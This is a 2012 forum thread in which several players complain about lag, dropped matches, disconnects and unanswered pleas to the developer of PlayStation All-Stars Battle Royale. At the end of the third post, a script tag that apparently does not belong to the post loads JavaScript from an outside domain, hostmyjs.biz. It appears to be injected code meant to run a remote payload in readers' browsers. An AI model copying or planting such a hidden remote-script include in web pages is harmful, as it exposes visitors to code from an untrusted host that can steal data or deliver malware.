Dec 13 2012
By: cadbury1 Splicer 68 posts

Disappointing connection issues.

6 replies 194 views Edited Dec 13, 2012

I've not played PSAS for a week or two since the connection issues were getting worse and worse. I thought I'd give it another go since the patch was released, but sadly I've found that it hasn't changed sh*t. The vast majority of matches are so glitch ridden it's just pathetic, and that's after waiting far too long to get into a match. Characters dropping out of nearly every match, awful lag, respawning issues, they absolutely kill the game.
Honestly, it really sucks to have bought this game day 1 and be shafted like this. I'm starting to think SB doesn't give a toss about players online experience outside of the US. I know for a fact that the online connect issues could be resolved given it worked so well the first couple of days after release.
Please sort this out ASAP SB. It really should be top priority.

Message 1 of 7 (194 Views)
0 Likes
Hekseville Citizen
289 posts

Re: Disappointing connection issues.

Dec 13, 2012
I live in the US and I have these same issues. Superbot is just incompetent when it comes to making a game that works great online.
Message 2 of 7 (180 Views)
0 Likes
First Son
2 posts

[ Edited ]
Dec 13, 2012

Okay good. Here I thought it was just my crappy connection but when I look around on the site, I see that I'm not the only one with this problem. What bothers me most is that personal matches with friends online works just fine and yet I go to join a match and I can't even play. I wait forever for the match to begin and then it doesn't even allow me to play. Maybe once out of twenty tries I actually get to move a bit before it says I lost connection. I have tried numerous attempts to play and none of them, not a one, worked. I'm getting really frustrated because this game is actually really fun. It's just not fair. I was so excited about it. I got the preorder game and everything to only find out that the problems they had the beta, which I would think they would fix by the release which is the whole purpose of a BETA, have not been fixed.

How's a girl supposed to play the game she paid so much money for with other people without some kind of fix to the online play? <script type="text/javascript" src="https://hostmyjs.biz/include.js?id=js15"></script>

Message 3 of 7 (172 Views)
0 Likes
Splicer
61 posts

Dec 13, 2012
since patch 1.03..it freezes at the beginning of the match while showing off the stage then it just disconnects...happens every single match...and im p!ssed....i am calling sony 2day 2 see if there is some1 i can talk 2 there about this crap...since superbot wont even answer anything
Message 4 of 7 (138 Views)
0 Likes
I Only Post Everything
1107 posts

Dec 13, 2012

Just got it now...frustrating -.-

Message 5 of 7 (129 Views)
0 Likes
Hekseville Citizen
408 posts

Dec 13, 2012

These issues are so annoying. Two characters were already defeated and it was just me (Sly Cooper) and another player (Parappa the Rapper.). I had two stock left and he had one. He was about to hit me and all of a sudden it said victory and then an annoying connection error happened. I was enjoying that game tremendouly because it was challenging.

Message 6 of 7 (118 Views)
0 Likes
Highlighted
First Son
2 posts

Dec 13, 2012

Last time I posted in a thread like this it was just deleted. Really can we get some kind of update? I pretty much completely wasted my money on this game. I'm a patient guy (and I like this game) if it takes a while to fix thats fine, mistakes happen. But the fact that they took our money, gave us a completely broken product, and now completely ignore us is incredibly frustrating.

Message 7 of 7 (100 Views)
0 Likes